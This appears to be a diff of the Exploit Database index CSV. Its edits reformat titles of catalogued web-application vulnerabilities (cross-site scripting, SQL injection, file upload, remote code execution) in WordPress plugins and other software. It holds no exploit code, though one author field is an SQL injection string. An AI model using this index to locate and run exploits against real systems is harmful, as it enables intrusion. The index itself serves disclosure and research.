37155,platforms/php/webapps/37155.txt,"WordPress Plugin WP-FaceThumb 0.1 - 'pagination_wp_facethum' Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0 @@ -36010,7 +36011,7 @@ id,file,description,date,author,platform,type,port 37192,platforms/php/webapps/37192.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - 'leaflet_marker.php?id' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37193,platforms/php/webapps/37193.txt,"WordPress Plugin GD Star Rating 1.9.16 - 'tpl_section' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37194,platforms/php/webapps/37194.txt,"WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37195,platforms/php/webapps/37195.txt,"WordPress Plugin WP Forum Server 1.7.3 - 'fs-admin/fs-admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 +37195,platforms/php/webapps/37195.txt,"WordPress Plugin WP Forum Server 1.7.3 - '/fs-admin/fs-admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37196,platforms/php/webapps/37196.txt,"WordPress Plugin Pretty Link Lite 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37200,platforms/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80 37201,platforms/php/webapps/37201.txt,"WordPress Plugin Sharebar 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 @@ -36018,8 +36019,8 @@ id,file,description,date,author,platform,type,port 37203,platforms/php/webapps/37203.txt,"WordPress Plugin Soundcloud Is Gold 2.1 - 'width' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37204,platforms/php/webapps/37204.txt,"WordPress Plugin Track That Stat 1.0.8 - Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37205,platforms/php/webapps/37205.txt,"LongTail JW Player - 'debug' Cross-Site Scripting",2012-05-16,gainover,php,webapps,0 -37206,platforms/php/webapps/37206.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - 'demo/PHPThumb.demo.showpic.php?title' Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 -37207,platforms/php/webapps/37207.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - 'demo/PHPThumb.demo.random.php?dir' Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 +37206,platforms/php/webapps/37206.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - '/demo/PHPThumb.demo.showpic.php?title' Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 +37207,platforms/php/webapps/37207.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - '/demo/PHPThumb.demo.random.php?dir' Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 37208,platforms/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting",2012-05-16,LiquidWorm,php,webapps,0 37209,platforms/php/webapps/37209.txt,"WordPress Plugin Really Simple Guest Post 1.0.6 - Local File Inclusion",2015-06-05,Kuroi'SH,php,webapps,0 37213,platforms/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal / Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",ios,webapps,0 @@ -36031,7 +36032,7 @@ id,file,description,date,author,platform,type,port 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/file_upload_submit.asp' Multiple Arbitrary File Upload / Code Executions",2012-05-21,"Aung Khant",asp,webapps,0 -37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp' path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 +37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp?path' Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 37226,platforms/php/webapps/37226.txt,"Concrete5 FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,php,webapps,0 @@ -36046,7 +36047,7 @@ id,file,description,date,author,platform,type,port 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37243,platforms/php/webapps/37243.txt,"WordPress Plugin Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 37244,platforms/php/webapps/37244.txt,"WordPress Plugin WP Mobile Edition - Local File Inclusion",2015-06-08,"Ali Khalil",php,webapps,0 -37245,platforms/php/webapps/37245.txt,"Pasworld - detail.php Blind SQL Injection",2015-06-08,"Sebastian khan",php,webapps,0 +37245,platforms/php/webapps/37245.txt,"Pasworld - 'detail.php' Blind SQL Injection",2015-06-08,"Sebastian khan",php,webapps,0 37266,platforms/php/webapps/37266.txt,"ClickHeat 1.14 - Cross-Site Request Forgery (Change Admin Password)",2015-06-12,"David Shanahan",php,webapps,80 37250,platforms/xml/webapps/37250.txt,"HP WebInspect 10.4 - XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0 39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0 @@ -36061,7 +36062,7 @@ id,file,description,date,author,platform,type,port 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - 'module.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 - 'modules.php' URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 -37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 - 'includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url' Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 +37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 - '/includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url' Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 - Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0 37315,platforms/php/webapps/37315.txt,"PHPCollab 2.5 - 'uploadfile.php' Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' and 1=1--",php,webapps,0 37257,platforms/php/webapps/37257.txt,"FiverrScript - Cross-Site Request Forgery (Add Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80 @@ -36101,14 +36102,14 @@ id,file,description,date,author,platform,type,port 37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Cross-Site Scripting",2012-06-01,Aboud-el,php,webapps,0 37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 - Arbitrary File Upload / Cross-Site Request Forgery",2012-06-03,KedAns-Dz,php,webapps,0 37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 - 'index.php' page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 -37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 - 'admin/admin.php?do' Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 +37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 - '/admin/admin.php?do' Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0 37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80 39249,platforms/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0 37440,platforms/php/webapps/37440.txt,"Watchguard XCS 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0 37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - Cross-Site Scripting",2015-06-24,hyp3rlinx,php,webapps,80 37361,platforms/php/webapps/37361.txt,"WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0 -37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection",2015-06-24,cfreer,php,webapps,80 +37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - 'register.php' SQL Injection",2015-06-24,cfreer,php,webapps,80 37364,platforms/php/webapps/37364.txt,"Joomla! Component com_simpleimageupload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80 37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0 37370,platforms/php/webapps/37370.php,"WordPress Plugin FCChat Widget 2.2.x - 'upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 @@ -36222,7 +36223,7 @@ id,file,description,date,author,platform,type,port 37515,platforms/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80 37516,platforms/hardware/webapps/37516.txt,"D-Link DSL-2750u / DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0 37519,platforms/php/webapps/37519.txt,"Joomla! Component com_hello - 'Controller' Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0 -37520,platforms/php/webapps/37520.txt,"Maian Survey - 'index.php' URI redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0 +37520,platforms/php/webapps/37520.txt,"Maian Survey - '/index.php' URI redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0 37521,platforms/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0 37522,platforms/php/webapps/37522.txt,"WordPress Plugin chenpress - Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 - Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80 @@ -36258,10 +36259,10 @@ id,file,description,date,author,platform,type,port 37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0 37575,platforms/php/webapps/37575.txt,"Joomla! Component com_photo - Multiple SQL Injections",2012-08-06,"Chokri Ben Achor",php,webapps,0 37577,platforms/asp/webapps/37577.txt,"PolarisCMS - 'WebForm_OnSubmit()' Cross-Site Scripting",2012-08-05,"Gjoko Krstic",asp,webapps,0 -37578,platforms/php/webapps/37578.txt,"Open Constructor - 'users/users.php?keyword' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 -37579,platforms/php/webapps/37579.txt,"Open Constructor - 'data/file/edit.php?result' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 +37578,platforms/php/webapps/37578.txt,"Open Constructor - '/users/users.php?keyword' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 +37579,platforms/php/webapps/37579.txt,"Open Constructor - '/data/file/edit.php?result' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 37580,platforms/php/webapps/37580.txt,"Open Constructor - 'confirm.php?q' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 -37581,platforms/php/webapps/37581.txt,"Dir2web - 'system/src/dispatcher.php?oid' SQL Injection",2012-08-07,"Daniel Correa",php,webapps,0 +37581,platforms/php/webapps/37581.txt,"Dir2web - '/system/src/dispatcher.php?oid' SQL Injection",2012-08-07,"Daniel Correa",php,webapps,0 37582,platforms/php/webapps/37582.py,"Mibew Messenger 1.6.4 - 'threadid' SQL Injection",2012-08-05,"Ucha Gobejishvili",php,webapps,0 37583,platforms/php/webapps/37583.txt,"YT-Videos Script - 'id' SQL Injection",2012-08-06,3spi0n,php,webapps,0 37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple SQL Injections",2012-08-07,"Chris Cooper",php,webapps,0 @@ -36700,7 +36701,7 @@ id,file,description,date,author,platform,type,port 38434,platforms/php/webapps/38434.txt,"PHP Address Book - '/addressbook/register/checklogin.php?Username' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38435,platforms/php/webapps/38435.txt,"PHP Address Book - '/addressbook/register/admin_index.php?q' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38436,platforms/php/webapps/38436.txt,"Zimbra - 'aspell.php' Cross-Site Scripting",2013-04-05,"Michael Scherer",php,webapps,0 -38438,platforms/php/webapps/38438.txt,"EasyPHP - 'index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,php,webapps,0 +38438,platforms/php/webapps/38438.txt,"EasyPHP - '/index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,php,webapps,0 38439,platforms/php/webapps/38439.txt,"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 38440,platforms/php/webapps/38440.txt,"phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0 38441,platforms/php/webapps/38441.txt,"WordPress Plugin Spiffy XSPF Player - 'playlist_id' SQL Injection",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0 @@ -36728,7 +36729,7 @@ id,file,description,date,author,platform,type,port 38484,platforms/php/webapps/38484.rb,"WordPress Plugin Ajax Load More < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,php,webapps,0 38487,platforms/php/webapps/38487.txt,"WordPress Theme Colormix - Multiple Vulnerabilities",2013-04-21,MustLive,php,webapps,0 38488,platforms/hardware/webapps/38488.txt,"Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0 -38491,platforms/php/webapps/38491.php,"SMF - 'index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0 +38491,platforms/php/webapps/38491.php,"SMF - '/index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0 38494,platforms/php/webapps/38494.txt,"WordPress Plugin WP Super Cache - PHP Remote Code Execution",2013-04-24,anonymous,php,webapps,0 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injections",2015-10-19,LiquidWorm,php,webapps,0 @@ -36880,8 +36881,8 @@ id,file,description,date,author,platform,type,port 38786,platforms/php/webapps/38786.txt,"Ziteman CMS - Login Page SQL Injection",2013-10-10,"Ashiyane Digital Security Team",php,webapps,0 38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution",2015-11-23,"Mohammad Reza Espargham",php,webapps,80 38799,platforms/php/webapps/38799.txt,"Bilboplanet - 'auth.php' SQL Injection",2013-10-11,"Omar Kurt",php,webapps,0 -38800,platforms/php/webapps/38800.txt,"FreeSMS - 'pages/crc_handler.php?scheduleid' SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0 -38801,platforms/php/webapps/38801.txt,"FreeSMS - 'pages/crc_handler.php' Multiple Cross-Site Scripting Vulnerabilities",2013-09-27,"Sarahma Security",php,webapps,0 +38800,platforms/php/webapps/38800.txt,"FreeSMS - '/pages/crc_handler.php?scheduleid' SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0 +38801,platforms/php/webapps/38801.txt,"FreeSMS - '/pages/crc_handler.php' Multiple Cross-Site Scripting Vulnerabilities",2013-09-27,"Sarahma Security",php,webapps,0 38806,platforms/cgi/webapps/38806.txt,"Bugzilla - 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",cgi,webapps,0 38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 - Tabular Reports Unspecified Cross-Site Scripting",2013-10-09,"Mateusz Goik",cgi,webapps,0 38808,platforms/php/webapps/38808.txt,"WordPress Plugin WP-Realty - 'listing_id' SQL Injection",2013-10-08,Napsterakos,php,webapps,0 @@ -36904,7 +36905,7 @@ id,file,description,date,author,platform,type,port 38844,platforms/php/webapps/38844.html,"WordPress Plugin Blue Wrench Video Widget - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0 38848,platforms/php/webapps/38848.php,"WordPress Theme Suco - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0 38852,platforms/php/webapps/38852.pl,"PHPThumb - 'PHPThumb.php' Arbitrary File Upload",2013-12-01,DevilScreaM,php,webapps,0 -38853,platforms/hardware/webapps/38853.sh,"D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,webapps,0 +38853,platforms/hardware/webapps/38853.sh,"D-Link DIR Series Routers - '/model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,webapps,0 38855,platforms/php/webapps/38855.txt,"WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection",2015-12-03,"Panagiotis Vagenas",php,webapps,0 38856,platforms/php/webapps/38856.txt,"WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps,0 38861,platforms/php/webapps/38861.txt,"WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0 @@ -36927,8 +36928,8 @@ id,file,description,date,author,platform,type,port 38880,platforms/php/webapps/38880.txt,"Veno File Manager - 'q' Arbitrary File Download",2013-12-11,"Daniel Godoy",php,webapps,0 38881,platforms/php/webapps/38881.html,"Piwigo - admin.php Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,php,webapps,0 38882,platforms/cgi/webapps/38882.txt,"Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service",2013-12-16,"DTAG Group Information Security",cgi,webapps,0 -38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'apps/news-events/newdetail.asp?id' SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0 -38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injections / Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0 +38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - '/apps/news-events/newdetail.asp?id' SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0 +38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - '/login.asp' Multiple Field SQL Injections / Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0 38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - 'checktransferstatus.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - 'additionalsettings.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 @@ -37088,7 +37089,7 @@ id,file,description,date,author,platform,type,port 39188,platforms/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0 39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0 39190,platforms/php/webapps/39190.php,"WordPress Plugin cnhk-Slideshow - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0 -39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager - 'backend/PHP/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",php,webapps,0 +39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager - '/backend/PHP/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",php,webapps,0 39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L - Arbitrary File Upload (Metasploit)",2016-01-07,Metasploit,hardware,webapps,0 39193,platforms/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",java,webapps,0 39197,platforms/php/webapps/39197.txt,"WordPress Plugin Booking System (Booking Calendar) - 'booking_form_id' SQL Injection",2014-05-21,maodun,php,webapps,0 @@ -37109,19 +37110,19 @@ id,file,description,date,author,platform,type,port 39237,platforms/php/webapps/39237.txt,"WordPress Plugin NextGEN Gallery 1.9.1 - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps,0 39238,platforms/php/webapps/39238.txt,"AtomCMS - SQL Injection / Arbitrary File Upload",2014-07-07,"Jagriti Sahu",php,webapps,0 39239,platforms/php/webapps/39239.txt,"xClassified - 'ads.php' SQL Injection",2014-07-07,Lazmania61,php,webapps,0 -39240,platforms/php/webapps/39240.txt,"WordPress Plugin BSK PDF Manager - 'wp-admin/admin.php' Multiple SQL Injections",2014-07-09,"Claudio Viviani",php,webapps,0 +39240,platforms/php/webapps/39240.txt,"WordPress Plugin BSK PDF Manager - '/wp-admin/admin.php' Multiple SQL Injections",2014-07-09,"Claudio Viviani",php,webapps,0 39241,platforms/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,java,webapps,4848 39243,platforms/php/webapps/39243.txt,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80 39245,platforms/php/webapps/39245.txt,"Roundcube Webmail 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39250,platforms/php/webapps/39250.txt,"WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps,0 39251,platforms/php/webapps/39251.txt,"WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 -39252,platforms/php/webapps/39252.txt,"WordPress Plugin WP Rss Poster - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 -39253,platforms/php/webapps/39253.txt,"WordPress Plugin ENL NewsLetter - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 +39252,platforms/php/webapps/39252.txt,"WordPress Plugin WP Rss Poster - '/wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 +39253,platforms/php/webapps/39253.txt,"WordPress Plugin ENL NewsLetter - '/wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39254,platforms/php/webapps/39254.html,"WordPress Plugin CopySafe PDF Protection - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 39255,platforms/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 -39256,platforms/php/webapps/39256.txt,"WordPress Plugin Tera Charts (tera-charts) - 'charts/treemap.php?fn' Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 -39257,platforms/php/webapps/39257.txt,"WordPress Plugin Tera Charts (tera-charts) - 'charts/zoomabletreemap.php?fn' Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 +39256,platforms/php/webapps/39256.txt,"WordPress Plugin Tera Charts (tera-charts) - '/charts/treemap.php?fn' Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 +39257,platforms/php/webapps/39257.txt,"WordPress Plugin Tera Charts (tera-charts) - '/charts/zoomabletreemap.php?fn' Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80 39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80 39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - Remote File Inclusion / Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80 @@ -37134,9 +37135,9 @@ id,file,description,date,author,platform,type,port 39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote File Inclusion",2014-07-28,"Govind Singh",php,webapps,0 39273,platforms/php/webapps/39273.txt,"CMSimple 4.4.4 - 'color' Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 39279,platforms/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 -39280,platforms/php/webapps/39280.txt,"WordPress Plugin HDW Player - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 +39280,platforms/php/webapps/39280.txt,"WordPress Plugin HDW Player - '/wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'user.php' Local File Inclusion",2014-08-08,0x4148,php,webapps,0 -39282,platforms/php/webapps/39282.txt,"WordPress Plugin GB Gallery Slideshow - 'wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",php,webapps,0 +39282,platforms/php/webapps/39282.txt,"WordPress Plugin GB Gallery Slideshow - '/wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",php,webapps,0 39283,platforms/php/webapps/39283.txt,"WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,php,webapps,0 39287,platforms/php/webapps/39287.txt,"WordPress Plugin WP Content Source Control - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",php,webapps,0 39288,platforms/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",multiple,webapps,0 @@ -37161,7 +37162,7 @@ id,file,description,date,author,platform,type,port 39320,platforms/php/webapps/39320.txt,"Gongwalker API Manager 1.1 - Blind SQL Injection",2016-01-26,HaHwul,php,webapps,80 39441,platforms/multiple/webapps/39441.txt,"Oracle GlassFish Server 4.1 - Directory Traversal",2015-08-27,"Trustwave's SpiderLabs",multiple,webapps,4848 39332,platforms/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0 -39333,platforms/php/webapps/39333.html,"WordPress Theme Elegance - 'elegance/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 +39333,platforms/php/webapps/39333.html,"WordPress Theme Elegance - '/elegance/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 39334,platforms/java/webapps/39334.txt,"Yealink VoIP Phones - '/servlet' HTTP Response Splitting",2014-06-12,"Jesus Oquendo",java,webapps,0 39335,platforms/ios/webapps/39335.txt,"Secure Item Hub 1.0 iOS - Multiple Vulnerabilities",2016-01-27,Vulnerability-Lab,ios,webapps,8080 39339,platforms/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",php,webapps,80 @@ -37237,7 +37238,7 @@ id,file,description,date,author,platform,type,port 39507,platforms/php/webapps/39507.txt,"WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",php,webapps,80 39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80 39521,platforms/php/webapps/39521.txt,"WordPress Plugin Bulk Delete 5.5.3 - 